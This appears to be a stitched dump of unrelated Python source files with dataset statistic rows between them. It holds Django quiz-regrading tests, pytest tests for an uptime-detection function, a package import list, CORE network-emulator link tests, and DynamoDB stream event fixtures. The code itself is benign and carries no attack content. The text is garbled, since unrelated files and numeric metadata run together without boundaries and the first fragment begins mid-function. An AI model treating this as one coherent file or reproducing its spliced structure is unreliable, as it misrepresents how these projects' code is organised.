self.assertTrue(result['success'])
# Regrade with wrong answer
# Given
regrade_answer = Answer.objects.get(id=self.answer.id)
# Try regrade with wrong data structure
# When
regrade_answer.answer = 1
regrade_answer.save()
details = self.answerpaper.regrade(self.question1.id)
err_msg = dedent("""\
User: {0}; Quiz: {1}; Question: {2}.
{3} answer not a list.""".format(
self.user.username,
self.quiz.description,
self.question1.summary,
self.question1.type
))
self.assertFalse(details[0])
self.assertEqual(details[1], err_msg)
# Try regrade with incorrect answer
# When
regrade_answer.answer = [self.testcase_1_id,
self.testcase_3_id,
self.testcase_2_id,
]
regrade_answer.save()
# Then
details = self.answerpaper.regrade(self.question1.id)
self.answer = self.answerpaper.answers.filter(question=self.question1
).last()
self.assertEqual(self.answer, regrade_answer)
self.assertTrue(details[0])
self.assertEqual(self.answer.marks, 0)
self.assertFalse(self.answer.correct)
def test_validate_regrade_arrange_incorrect_answer(self):
# Given
arrange_answer = [self.testcase_1_id,
self.testcase_3_id,
self.testcase_2_id,
]
self.answer = Answer(question=self.question1,
answer=arrange_answer,
)
self.answer.save()
self.answerpaper.answers.add(self.answer)
# When
json_data = None
result = self.answerpaper.validate_answer(arrange_answer,
self.question1, json_data
)
# Then
self.assertFalse(result['success'])
# Regrade with wrong answer
# Given
regrade_answer = Answer.objects.get(id=self.answer.id)
regrade_answer.answer = [self.testcase_1_id,
self.testcase_2_id,
self.testcase_3_id,
]
regrade_answer.save()
# When
details = self.answerpaper.regrade(self.question1.id)
# Then
self.answer = self.answerpaper.answers.filter(question=self.question1
).last()
self.assertEqual(self.answer, regrade_answer)
self.assertTrue(details[0])
self.assertEqual(self.answer.marks, 1)
self.assertTrue(self.answer.correct)
class MCQShuffleTestCases(unittest.TestCase):
@classmethod
def setUpClass(self):
# Creating User
self.user = User.objects.get(username='demo_user_100')
self.user2 = User.objects.get(username='demo_user_101')
self.user_ip = '127.0.0.1'
# Creating Course
self.course = Course.objects.get(name="Python Course 100")
# Creating Quiz
self.quiz = Quiz.objects.get(description="demo quiz 100")
# Creating Question paper
self.question_paper = QuestionPaper.objects.get(quiz=self.quiz)
self.question_paper.shuffle_testcases = True
self.question_paper.save()
# Creating Question
self.question1 = Question.objects.create(summary='mcq1', points=1,
type='code', user=self.user,
)
self.question1.language = 'python'
self.question1.type = "mcq"
self.question1.test_case_type = 'Mcqtestcase'
self.question1.description = 'Which option is Correct?'
self.question1.save()
# For questions
self.mcq_based_testcase_1 = McqTestCase(question=self.question1,
options="Correct",
correct=True,
type='mcqtestcase',
)
self.mcq_based_testcase_1.save()
self.mcq_based_testcase_2 = McqTestCase(question=self.question1,
options="Incorrect",
correct=False,
type='mcqtestcase',
)
self.mcq_based_testcase_2.save()
self.mcq_based_testcase_3 = McqTestCase(question=self.question1,
options="Incorrect",
correct=False,
type='mcqtestcase',
)
self.mcq_based_testcase_3.save()
self.mcq_based_testcase_4 = McqTestCase(question=self.question1,
options="Incorrect",
correct=False,
type='mcqtestcase',
)
self.mcq_based_testcase_4.save()
self.question_paper.fixed_questions.add(self.question1)
self.answerpaper = self.question_paper.make_answerpaper(
user=self.user, ip=self.user_ip,
attempt_num=1,
course_id=self.course.id
)
# Answerpaper for user 2
self.answerpaper2 = self.question_paper.make_answerpaper(
user=self.user2, ip=self.user_ip,
attempt_num=1,
course_id=self.course.id
)
@classmethod
def tearDownClass(self):
self.question1.delete()
self.answerpaper.delete()
self.answerpaper2.delete()
def test_shuffle_test_cases(self):
# Given
# When
user_testcase = self.question1.get_ordered_test_cases(
self.answerpaper
)
order1 = [tc.id for tc in user_testcase]
user2_testcase = self.question1.get_ordered_test_cases(
self.answerpaper2
)
order2 = [tc.id for tc in user2_testcase]
self.question_paper.shuffle_testcases = False
self.question_paper.save()
answerpaper3 = self.question_paper.make_answerpaper(
user=self.user2, ip=self.user_ip,
attempt_num=self.answerpaper.attempt_number+1,
course_id=self.course.id
)
not_ordered_testcase = self.question1.get_ordered_test_cases(
answerpaper3
)
get_test_cases = self.question1.get_test_cases()
# Then
self.assertNotEqual(order1, order2)
self.assertEqual(get_test_cases, not_ordered_testcase)
answerpaper3.delete()
| 39.831731
| 78
| 0.517019
| 2,954
| 33,140
| 5.644888
| 0.06872
| 0.081079
| 0.045337
| 0.01919
| 0.877841
| 0.833223
| 0.821589
| 0.801379
| 0.792864
| 0.786447
| 0
| 0.021824
| 0.39994
| 33,140
| 831
| 79
| 39.879663
| 0.816705
| 0.040797
| 0
| 0.693739
| 0
| 0
| 0.046333
| 0
| 0
| 0
| 0
| 0
| 0.094755
| 1
| 0.043993
| false
| 0.005076
| 0.010152
| 0
| 0.064298
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
f7f5953df70a457cdcfa1364dcff1a4ea0d3973b
| 4,490
|
py
|
Python
|
tests/features/test_build_features.py
|
catalyst-cooperative/epacems_ramp_rates
|
5a5ea6f9571823f7ef3f9c66abb4d9acb79820be
|
[
"MIT"
] | 1
|
2021-07-02T15:31:22.000Z
|
2021-07-02T15:31:22.000Z
|
tests/features/test_build_features.py
|
catalyst-cooperative/epacems_ramp_rates
|
5a5ea6f9571823f7ef3f9c66abb4d9acb79820be
|
[
"MIT"
] | 4
|
2021-07-30T19:42:10.000Z
|
2021-08-16T19:12:21.000Z
|
tests/features/test_build_features.py
|
catalyst-cooperative/epacems_ramp_rates
|
5a5ea6f9571823f7ef3f9c66abb4d9acb79820be
|
[
"MIT"
] | null | null | null |
import pytest
import pandas as pd
import numpy as np
from ramprate.build_features import _find_uptime
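# Behaviour exercised below: _find_uptime pairs the boundaries of zero runs in
# a time-indexed series into a DataFrame of timestamps.  With downtime=True the
# rows describe downtime intervals (shutdown = first zero after a non-zero
# value, startup = last zero before a non-zero value); with the default
# downtime=False they describe uptime intervals instead, and NaT marks an
# interval that is open at the start or end of the series.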
def test__find_uptime_start_and_end_nonzero():
dt_idx = pd.date_range(start="2020-01-01 00:00", periods=6, freq="h", tz="UTC")
data = [2, 2, 0, 0, 0, 2]
# downtime=True
# first zero after non-zero
shutdown = pd.to_datetime(["2020-01-01 02:00"], utc=True)
# last zero before non-zero
startup = pd.to_datetime(["2020-01-01 04:00"], utc=True)
expected = pd.DataFrame({"shutdown": shutdown, "startup": startup})
actual = _find_uptime(pd.Series(data, index=dt_idx), downtime=True)
pd.testing.assert_frame_equal(actual, expected)
# end points ('startup') are after start points ('shutdown')
assert actual.diff(axis=1)["startup"].dt.total_seconds().fillna(1).ge(0).all()
# downtime=False
# last zero before non-zero
startup = pd.to_datetime([pd.NaT, "2020-01-01 04:00"], utc=True)
# first zero after non-zero
shutdown = pd.to_datetime(["2020-01-01 02:00", pd.NaT], utc=True)
expected = pd.DataFrame({"startup": startup, "shutdown": shutdown})
actual = _find_uptime(pd.Series(data, index=dt_idx))
pd.testing.assert_frame_equal(actual, expected)
# end points ('shutdown') are after start points ('startup')
assert actual.diff(axis=1)["shutdown"].dt.total_seconds().fillna(1).ge(0).all()
def test__find_uptime_all_zeros():
dt_idx = pd.date_range(start="2020-01-01 00:00", periods=6, freq="h", tz="UTC")
data = [0, 0, 0, 0, 0, 0]
# downtime=True
# first zero after non-zero
shutdown = pd.to_datetime([pd.NaT], utc=True)
# last zero before non-zero
startup = pd.to_datetime([pd.NaT], utc=True)
expected = pd.DataFrame({"shutdown": shutdown, "startup": startup})
actual = _find_uptime(pd.Series(data, index=dt_idx), downtime=True)
pd.testing.assert_frame_equal(actual, expected)
# downtime=False
# first zero after non-zero
shutdown = pd.to_datetime([], utc=True)
# last zero before non-zero
startup = pd.to_datetime([], utc=True)
expected = pd.DataFrame({"startup": startup, "shutdown": shutdown})
actual = _find_uptime(pd.Series(data, index=dt_idx))
pd.testing.assert_frame_equal(actual, expected)
def test__find_uptime_no_zeros():
dt_idx = pd.date_range(start="2020-01-01 00:00", periods=6, freq="h", tz="UTC")
data = [5, 5, 5, 5, 5, 5]
# downtime=True
# first zero after non-zero
shutdown = pd.to_datetime([], utc=True)
# last zero before non-zero
startup = pd.to_datetime([], utc=True)
expected = pd.DataFrame({"shutdown": shutdown, "startup": startup})
actual = _find_uptime(pd.Series(data, index=dt_idx), downtime=True)
pd.testing.assert_frame_equal(actual, expected)
# downtime=False
# first zero after non-zero
shutdown = pd.to_datetime([pd.NaT], utc=True)
# last zero before non-zero
startup = pd.to_datetime([pd.NaT], utc=True)
expected = pd.DataFrame({"startup": startup, "shutdown": shutdown})
actual = _find_uptime(pd.Series(data, index=dt_idx))
pd.testing.assert_frame_equal(actual, expected)
def test__find_uptime_start_zero_end_zero():
dt_idx = pd.date_range(start="2020-01-01 00:00", periods=6, freq="h", tz="UTC")
data = [0, 2, 2, 0, 2, 0]
# downtime=True
# first zero after non-zero
shutdown = pd.to_datetime([pd.NaT, "2020-01-01 03:00", "2020-01-01 05:00"], utc=True)
# last zero before non-zero
startup = pd.to_datetime(["2020-01-01 00:00", "2020-01-01 03:00", pd.NaT], utc=True)
expected = pd.DataFrame({"shutdown": shutdown, "startup": startup})
actual = _find_uptime(pd.Series(data, index=dt_idx), downtime=True)
pd.testing.assert_frame_equal(actual, expected)
# end points ('startup') are after start points ('shutdown')
assert actual.diff(axis=1)["startup"].dt.total_seconds().fillna(1).ge(0).all()
# downtime=False
# last zero before non-zero
startup = pd.to_datetime(["2020-01-01 00:00", "2020-01-01 03:00"], utc=True)
# first zero after non-zero
shutdown = pd.to_datetime(["2020-01-01 03:00", "2020-01-01 05:00"], utc=True)
expected = pd.DataFrame({"startup": startup, "shutdown": shutdown})
actual = _find_uptime(pd.Series(data, index=dt_idx))
pd.testing.assert_frame_equal(actual, expected)
# end points ('shutdown') are after start points ('startup')
assert actual.diff(axis=1)["shutdown"].dt.total_seconds().fillna(1).ge(0).all()
| 42.358491
| 89
| 0.675724
| 689
| 4,490
| 4.265602
| 0.108853
| 0.032664
| 0.043552
| 0.046274
| 0.952365
| 0.939775
| 0.939775
| 0.937734
| 0.935012
| 0.935012
| 0
| 0.061916
| 0.165479
| 4,490
| 105
| 90
| 42.761905
| 0.722445
| 0.170824
| 0
| 0.666667
| 0
| 0
| 0.114239
| 0
| 0
| 0
| 0
| 0
| 0.2
| 1
| 0.066667
| false
| 0
| 0.066667
| 0
| 0.133333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
79072ecbaf7146f0b35ba3fb0dc12f5ddb30f1d3
| 506
|
py
|
Python
|
nexus/bot/handlers/__init__.py
|
RobbiNespu/hyperboria
|
7db858386f1a20e8d49bc16f53bfd7f1e4d03f7e
|
[
"Unlicense"
] | 54
|
2021-01-07T03:02:36.000Z
|
2022-03-28T17:19:29.000Z
|
nexus/bot/handlers/__init__.py
|
the-superpirate/hyperboria
|
74776166158d07b199677f9738862e5f1fa54367
|
[
"Unlicense"
] | 10
|
2021-01-08T17:38:59.000Z
|
2022-02-28T14:34:45.000Z
|
nexus/bot/handlers/__init__.py
|
the-superpirate/hyperboria
|
74776166158d07b199677f9738862e5f1fa54367
|
[
"Unlicense"
] | 16
|
2020-12-28T18:31:44.000Z
|
2022-02-22T15:00:53.000Z
|
from . import (
admin,
ban,
close,
contact,
copyright,
donate,
download,
emoji,
help,
legacy,
noop,
roll,
search,
settings,
shortlink,
start,
stop,
submit,
top_missed,
view,
vote,
)
__all__ = ['admin', 'ban', 'contact', 'copyright', 'close', 'donate', 'download', 'emoji', 'help',
'legacy', 'noop', 'roll', 'search', 'settings',
'shortlink', 'start', 'stop', 'submit', 'top_missed', 'view', 'vote']
| 18.071429
| 98
| 0.51581
| 47
| 506
| 5.425532
| 0.531915
| 0.062745
| 0.14902
| 0.180392
| 0.721569
| 0.721569
| 0.721569
| 0.721569
| 0.721569
| 0.721569
| 0
| 0
| 0.3083
| 506
| 27
| 99
| 18.740741
| 0.728571
| 0
| 0
| 0
| 0
| 0
| 0.241107
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.038462
| 0
| 0.038462
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
791eb77a671c04392a73a95336ef324cf0637fdf
| 12,670
|
py
|
Python
|
daemon/tests/test_links.py
|
alehmannFRA-UAS/core
|
bcf74297851e40e383c279f1f0a7eff3257c258b
|
[
"BSD-2-Clause"
] | 3
|
2022-03-14T21:53:08.000Z
|
2022-03-14T21:54:18.000Z
|
daemon/tests/test_links.py
|
alehmannFRA-UAS/core
|
bcf74297851e40e383c279f1f0a7eff3257c258b
|
[
"BSD-2-Clause"
] | null | null | null |
daemon/tests/test_links.py
|
alehmannFRA-UAS/core
|
bcf74297851e40e383c279f1f0a7eff3257c258b
|
[
"BSD-2-Clause"
] | null | null | null |
from typing import Tuple
import pytest
from core.emulator.data import IpPrefixes, LinkOptions
from core.emulator.session import Session
from core.errors import CoreError
from core.nodes.base import CoreNode
from core.nodes.network import SwitchNode
INVALID_ID: int = 100
LINK_OPTIONS: LinkOptions = LinkOptions(
delay=50, bandwidth=5000000, loss=25, dup=25, jitter=10, buffer=100
)
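# Fixtures shared by the tests below: LINK_OPTIONS sets non-default values for
# the shaping parameters so the assertions can detect whether options were
# applied, and INVALID_ID is an id that matches no node in the session.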
def create_ptp_network(
session: Session, ip_prefixes: IpPrefixes
) -> Tuple[CoreNode, CoreNode]:
# create nodes
node1 = session.add_node(CoreNode)
node2 = session.add_node(CoreNode)
# link the two nodes directly (point-to-point)
iface1_data = ip_prefixes.create_iface(node1)
iface2_data = ip_prefixes.create_iface(node2)
session.add_link(node1.id, node2.id, iface1_data, iface2_data)
# instantiate session
session.instantiate()
return node1, node2
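# TestLinks walks the link API through every endpoint combination
# (node-to-node, node-to-net, net-to-net): adding, updating, clearing and
# deleting links, plus the CoreError paths for invalid or unlinked endpoints.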
class TestLinks:
def test_add_node_to_node(self, session: Session, ip_prefixes: IpPrefixes):
# given
node1 = session.add_node(CoreNode)
node2 = session.add_node(CoreNode)
iface1_data = ip_prefixes.create_iface(node1)
iface2_data = ip_prefixes.create_iface(node2)
# when
iface1, iface2 = session.add_link(
node1.id, node2.id, iface1_data, iface2_data, options=LINK_OPTIONS
)
# then
assert node1.get_iface(iface1_data.id)
assert node2.get_iface(iface2_data.id)
assert iface1 is not None
assert iface2 is not None
assert iface1.local_options == LINK_OPTIONS
assert iface1.has_local_netem
assert iface2.local_options == LINK_OPTIONS
assert iface2.has_local_netem
def test_add_node_to_net(self, session: Session, ip_prefixes: IpPrefixes):
# given
node1 = session.add_node(CoreNode)
node2 = session.add_node(SwitchNode)
iface1_data = ip_prefixes.create_iface(node1)
# when
iface, _ = session.add_link(
node1.id, node2.id, iface1_data=iface1_data, options=LINK_OPTIONS
)
# then
assert node2.links()
assert node1.get_iface(iface1_data.id)
assert iface is not None
assert iface.local_options == LINK_OPTIONS
assert iface.has_local_netem
def test_add_net_to_node(self, session: Session, ip_prefixes: IpPrefixes):
# given
node1 = session.add_node(SwitchNode)
node2 = session.add_node(CoreNode)
iface2_data = ip_prefixes.create_iface(node2)
# when
_, iface = session.add_link(
node1.id, node2.id, iface2_data=iface2_data, options=LINK_OPTIONS
)
# then
assert node1.links()
assert node2.get_iface(iface2_data.id)
assert iface is not None
assert iface.local_options == LINK_OPTIONS
assert iface.has_local_netem
def test_add_net_to_net(self, session):
# given
node1 = session.add_node(SwitchNode)
node2 = session.add_node(SwitchNode)
# when
iface, _ = session.add_link(node1.id, node2.id, options=LINK_OPTIONS)
# then
assert node1.links()
assert iface is not None
assert iface.local_options == LINK_OPTIONS
assert iface.options == LINK_OPTIONS
assert iface.has_local_netem
assert iface.has_netem
def test_add_node_to_node_uni(self, session: Session, ip_prefixes: IpPrefixes):
# given
node1 = session.add_node(CoreNode)
node2 = session.add_node(CoreNode)
iface1_data = ip_prefixes.create_iface(node1)
iface2_data = ip_prefixes.create_iface(node2)
link_options1 = LinkOptions(
delay=50,
bandwidth=5000000,
loss=25,
dup=25,
jitter=10,
buffer=100,
unidirectional=True,
)
link_options2 = LinkOptions(
delay=51,
bandwidth=5000001,
loss=26,
dup=26,
jitter=11,
buffer=101,
unidirectional=True,
)
# when
iface1, iface2 = session.add_link(
node1.id, node2.id, iface1_data, iface2_data, link_options1
)
session.update_link(
node2.id, node1.id, iface2_data.id, iface1_data.id, link_options2
)
# then
assert node1.get_iface(iface1_data.id)
assert node2.get_iface(iface2_data.id)
assert iface1 is not None
assert iface2 is not None
assert iface1.local_options == link_options1
assert iface1.has_local_netem
assert iface2.local_options == link_options2
assert iface2.has_local_netem
def test_update_node_to_net(self, session: Session, ip_prefixes: IpPrefixes):
# given
node1 = session.add_node(CoreNode)
node2 = session.add_node(SwitchNode)
iface1_data = ip_prefixes.create_iface(node1)
iface1, _ = session.add_link(node1.id, node2.id, iface1_data)
assert iface1.local_options != LINK_OPTIONS
# when
session.update_link(
node1.id, node2.id, iface1_id=iface1_data.id, options=LINK_OPTIONS
)
# then
assert iface1.local_options == LINK_OPTIONS
assert iface1.has_local_netem
def test_update_net_to_node(self, session: Session, ip_prefixes: IpPrefixes):
# given
node1 = session.add_node(SwitchNode)
node2 = session.add_node(CoreNode)
iface2_data = ip_prefixes.create_iface(node2)
_, iface2 = session.add_link(node1.id, node2.id, iface2_data=iface2_data)
assert iface2.local_options != LINK_OPTIONS
# when
session.update_link(
node1.id, node2.id, iface2_id=iface2_data.id, options=LINK_OPTIONS
)
# then
assert iface2.local_options == LINK_OPTIONS
assert iface2.has_local_netem
def test_update_ptp(self, session: Session, ip_prefixes: IpPrefixes):
# given
node1 = session.add_node(CoreNode)
node2 = session.add_node(CoreNode)
iface1_data = ip_prefixes.create_iface(node1)
iface2_data = ip_prefixes.create_iface(node2)
iface1, iface2 = session.add_link(node1.id, node2.id, iface1_data, iface2_data)
assert iface1.local_options != LINK_OPTIONS
assert iface2.local_options != LINK_OPTIONS
# when
session.update_link(
node1.id, node2.id, iface1_data.id, iface2_data.id, LINK_OPTIONS
)
# then
assert iface1.local_options == LINK_OPTIONS
assert iface1.has_local_netem
assert iface2.local_options == LINK_OPTIONS
assert iface2.has_local_netem
def test_update_net_to_net(self, session: Session, ip_prefixes: IpPrefixes):
# given
node1 = session.add_node(SwitchNode)
node2 = session.add_node(SwitchNode)
iface1, _ = session.add_link(node1.id, node2.id)
assert iface1.local_options != LINK_OPTIONS
# when
session.update_link(node1.id, node2.id, options=LINK_OPTIONS)
# then
assert iface1.local_options == LINK_OPTIONS
assert iface1.has_local_netem
assert iface1.options == LINK_OPTIONS
assert iface1.has_netem
def test_clear_net_to_net(self, session: Session, ip_prefixes: IpPrefixes):
# given
node1 = session.add_node(SwitchNode)
node2 = session.add_node(SwitchNode)
iface1, _ = session.add_link(node1.id, node2.id, options=LINK_OPTIONS)
assert iface1.local_options == LINK_OPTIONS
assert iface1.has_local_netem
assert iface1.options == LINK_OPTIONS
assert iface1.has_netem
# when
options = LinkOptions(delay=0, bandwidth=0, loss=0.0, dup=0, jitter=0, buffer=0)
session.update_link(node1.id, node2.id, options=options)
# then
assert iface1.local_options.is_clear()
assert not iface1.has_local_netem
assert iface1.options.is_clear()
assert not iface1.has_netem
def test_delete_node_to_node(self, session: Session, ip_prefixes: IpPrefixes):
# given
        node1 = session.add_node(CoreNode)
        node2 = session.add_node(CoreNode)
        iface1_data = ip_prefixes.create_iface(node1)
        iface2_data = ip_prefixes.create_iface(node2)
        session.add_link(node1.id, node2.id, iface1_data, iface2_data)
        assert node1.get_iface(iface1_data.id)
        assert node2.get_iface(iface2_data.id)

        # when
        session.delete_link(node1.id, node2.id, iface1_data.id, iface2_data.id)

        # then
        assert iface1_data.id not in node1.ifaces
        assert iface2_data.id not in node2.ifaces

    def test_delete_node_to_net(self, session: Session, ip_prefixes: IpPrefixes):
        # given
        node1 = session.add_node(CoreNode)
        node2 = session.add_node(SwitchNode)
        iface1_data = ip_prefixes.create_iface(node1)
        session.add_link(node1.id, node2.id, iface1_data)
        assert node1.get_iface(iface1_data.id)

        # when
        session.delete_link(node1.id, node2.id, iface1_id=iface1_data.id)

        # then
        assert iface1_data.id not in node1.ifaces

    def test_delete_net_to_node(self, session: Session, ip_prefixes: IpPrefixes):
        # given
        node1 = session.add_node(SwitchNode)
        node2 = session.add_node(CoreNode)
        iface2_data = ip_prefixes.create_iface(node2)
        session.add_link(node1.id, node2.id, iface2_data=iface2_data)
        assert node2.get_iface(iface2_data.id)

        # when
        session.delete_link(node1.id, node2.id, iface2_id=iface2_data.id)

        # then
        assert iface2_data.id not in node2.ifaces

    def test_delete_net_to_net(self, session: Session, ip_prefixes: IpPrefixes):
        # given
        node1 = session.add_node(SwitchNode)
        node2 = session.add_node(SwitchNode)
        session.add_link(node1.id, node2.id)
        assert node1.get_linked_iface(node2)

        # when
        session.delete_link(node1.id, node2.id)

        # then
        assert not node1.get_linked_iface(node2)

    def test_delete_node_error(self, session: Session, ip_prefixes: IpPrefixes):
        # given
        node1 = session.add_node(SwitchNode)
        node2 = session.add_node(SwitchNode)
        session.add_link(node1.id, node2.id)
        assert node1.get_linked_iface(node2)

        # when
        with pytest.raises(CoreError):
            session.delete_link(node1.id, INVALID_ID)
        with pytest.raises(CoreError):
            session.delete_link(INVALID_ID, node2.id)

    def test_delete_net_to_net_error(self, session: Session, ip_prefixes: IpPrefixes):
        # given
        node1 = session.add_node(SwitchNode)
        node2 = session.add_node(SwitchNode)
        node3 = session.add_node(SwitchNode)
        session.add_link(node1.id, node2.id)
        assert node1.get_linked_iface(node2)

        # when
        with pytest.raises(CoreError):
            session.delete_link(node1.id, node3.id)

    def test_delete_node_to_net_error(self, session: Session, ip_prefixes: IpPrefixes):
        # given
        node1 = session.add_node(CoreNode)
        node2 = session.add_node(SwitchNode)
        node3 = session.add_node(SwitchNode)
        iface1_data = ip_prefixes.create_iface(node1)
        iface1, _ = session.add_link(node1.id, node2.id, iface1_data)
        assert iface1

        # when
        with pytest.raises(CoreError):
            session.delete_link(node1.id, node3.id)

    def test_delete_net_to_node_error(self, session: Session, ip_prefixes: IpPrefixes):
        # given
        node1 = session.add_node(SwitchNode)
        node2 = session.add_node(CoreNode)
        node3 = session.add_node(SwitchNode)
        iface2_data = ip_prefixes.create_iface(node2)
        _, iface2 = session.add_link(node1.id, node2.id, iface2_data=iface2_data)
        assert iface2

        # when
        with pytest.raises(CoreError):
            session.delete_link(node1.id, node3.id)

    def test_delete_node_to_node_error(self, session: Session, ip_prefixes: IpPrefixes):
        # given
        node1 = session.add_node(CoreNode)
        node2 = session.add_node(CoreNode)
        node3 = session.add_node(SwitchNode)
        iface1_data = ip_prefixes.create_iface(node1)
        iface2_data = ip_prefixes.create_iface(node2)
        iface1, iface2 = session.add_link(node1.id, node2.id, iface1_data, iface2_data)
        assert iface1
        assert iface2

        # when
        with pytest.raises(CoreError):
            session.delete_link(node1.id, node3.id)
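
    # The "session" and "ip_prefixes" fixtures used by the tests above come
    # from the suite's conftest, defined earlier in this file's repository.
    # A minimal sketch of how such fixtures could be wired up -- the CoreEmu
    # entry point is real, but the IpPrefixes import path and constructor
    # arguments vary across CORE releases, so treat this as an illustrative
    # assumption rather than the project's actual fixture code:
    #
    #     import pytest
    #     from core.emulator.coreemu import CoreEmu
    #
    #     @pytest.fixture
    #     def session():
    #         coreemu = CoreEmu()
    #         session = coreemu.create_session()
    #         yield session
    #         coreemu.shutdown()
    #
    #     @pytest.fixture
    #     def ip_prefixes():
    #         # hypothetical prefix; any unused /24 works for these tests
    #         return IpPrefixes(ip4_prefix="10.0.0.0/24")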
| 34.523161
| 88
| 0.658879
| 1,585
| 12,670
| 5.008202
| 0.05489
| 0.080625
| 0.077601
| 0.058453
| 0.90514
| 0.894558
| 0.875787
| 0.853993
| 0.823003
| 0.80839
| 0
| 0.038302
| 0.260221
| 12,670
| 366
| 89
| 34.617486
| 0.808599
| 0.026361
| 0
| 0.624
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.292
| 1
| 0.08
| false
| 0
| 0.028
| 0
| 0.116
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 6
| 792b2e276d9654b59ec6ab9f9fb6f45f7f8145c7
| 7,761
| py
| Python
| tests/test_dynamo_event.py
| wellcomecollection/aws_utils
| b2c54b44fcd7edf9877903f1b0ef1aba853926c3
| ["MIT"]
| null
| null
| null
| tests/test_dynamo_event.py
| wellcomecollection/aws_utils
| b2c54b44fcd7edf9877903f1b0ef1aba853926c3
| ["MIT"]
| 8
| 2017-11-07T15:44:42.000Z
| 2019-07-25T16:35:00.000Z
| tests/test_dynamo_event.py
| wellcomecollection/aws_utils
| b2c54b44fcd7edf9877903f1b0ef1aba853926c3
| ["MIT"]
| null
| null
| null
# -*- encoding: utf-8 -*-
from wellcome_aws_utils import dynamo_event

event_source_arn = (
    "arn:aws:dynamodb:us-east-1:123456789012:"
    "table/BarkTable/stream/2016-11-16T20:42:48.104"
)


def create_insert_record(message):
    return {
        "ApproximateCreationDateTime": 1479499740,
        "Keys": {
            "Timestamp": {
                "S": "2016-11-18:12:09:36"
            },
            "Username": {
                "S": "John Doe"
            }
        },
        "NewImage": {
            "Timestamp": {
                "S": "2016-11-18:12:09:36"
            },
            "Message": {
                "S": message
            },
            "Username": {
                "S": "John Doe"
            }
        },
        "SequenceNumber": "13021600000000001596893679",
        "SizeBytes": 112,
        "StreamViewType": "NEW_IMAGE"
    }


def create_remove_record(message):
    return {
        "ApproximateCreationDateTime": 1479499740,
        "Keys": {
            "Timestamp": {
                "S": "2016-11-18:12:09:36"
            },
            "Username": {
                "S": "John Doe"
            }
        },
        "OldImage": {
            "Timestamp": {
                "S": "2016-11-18:12:09:36"
            },
            "Message": {
                "S": message
            },
            "Username": {
                "S": "John Doe"
            }
        },
        "SequenceNumber": "13021600000000001596893679",
        "SizeBytes": 112,
        "StreamViewType": "OLD_IMAGE"
    }


def create_modify_record(old_message, new_message):
    return {
        "ApproximateCreationDateTime": 1479499740,
        "Keys": {
            "Timestamp": {
                "S": "2016-11-18:12:09:36"
            },
            "Username": {
                "S": "John Doe"
            }
        },
        "OldImage": {
            "Timestamp": {
                "S": "2016-11-18:12:09:36"
            },
            "Message": {
                "S": old_message
            },
            "Username": {
                "S": "John Doe"
            }
        },
        "NewImage": {
            "Timestamp": {
                "S": "2016-11-18:12:09:36"
            },
            "Message": {
                "S": new_message
            },
            "Username": {
                "S": "John Doe"
            }
        },
        "SequenceNumber": "13021600000000001596893679",
        "SizeBytes": 112,
        "StreamViewType": "NEW_AND_OLD_IMAGES"
    }


def create_modify_record_keys_only():
    return {
        "ApproximateCreationDateTime": 1479499740,
        "Keys": {
            "Timestamp": {
                "S": "2016-11-18:12:09:36"
            },
            "Username": {
                "S": "John Doe"
            }
        },
        "SequenceNumber": "13021600000000001596893679",
        "SizeBytes": 112,
        "StreamViewType": "KEYS_ONLY"
    }
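
# Between them, the four record builders above cover every DynamoDB
# StreamViewType -- NEW_IMAGE, OLD_IMAGE, NEW_AND_OLD_IMAGES, and KEYS_ONLY --
# i.e. whether a stream record carries the item as it looked after the write,
# as it looked before, both images, or only the key attributes.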

def create_insert_event(message):
    return {
        "eventID": "7de3041dd709b024af6f29e4fa13d34c",
        "eventName": "INSERT",
        "eventVersion": "1.1",
        "eventSource": "aws:dynamodb",
        "awsRegion": "us-west-2",
        "dynamodb": create_insert_record(message),
        "eventSourceARN": event_source_arn
    }


def create_remove_event(message):
    return {
        "eventID": "7de3041dd709b024af6f29e4fa13d34c",
        "eventName": "REMOVE",
        "eventVersion": "1.1",
        "eventSource": "aws:dynamodb",
        "awsRegion": "us-west-2",
        "dynamodb": create_remove_record(message),
        "eventSourceARN": event_source_arn
    }


def create_modify_event(old_message, new_message):
    return {
        "eventID": "7de3041dd709b024af6f29e4fa13d34c",
        "eventName": "MODIFY",
        "eventVersion": "1.1",
        "eventSource": "aws:dynamodb",
        "awsRegion": "us-west-2",
        "dynamodb": create_modify_record(old_message, new_message),
        "eventSourceARN": event_source_arn
    }


def create_modify_event_keys_only():
    return {
        "eventID": "7de3041dd709b024af6f29e4fa13d34c",
        "eventName": "MODIFY",
        "eventVersion": "1.1",
        "eventSource": "aws:dynamodb",
        "awsRegion": "us-west-2",
        "dynamodb": create_modify_record_keys_only(),
        "eventSourceARN": event_source_arn
    }
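
# The nested {"S": ...} wrappers above are DynamoDB's attribute-value
# encoding. The deserialize_values=True behaviour asserted in the tests
# below plausibly maps onto boto3's TypeDeserializer; that mapping is an
# assumption about the implementation, not something this file confirms:
#
#     from boto3.dynamodb.types import TypeDeserializer
#
#     deserializer = TypeDeserializer()
#     image = {"Username": {"S": "John Doe"}, "SizeBytes": {"N": "112"}}
#     plain = {k: deserializer.deserialize(v) for k, v in image.items()}
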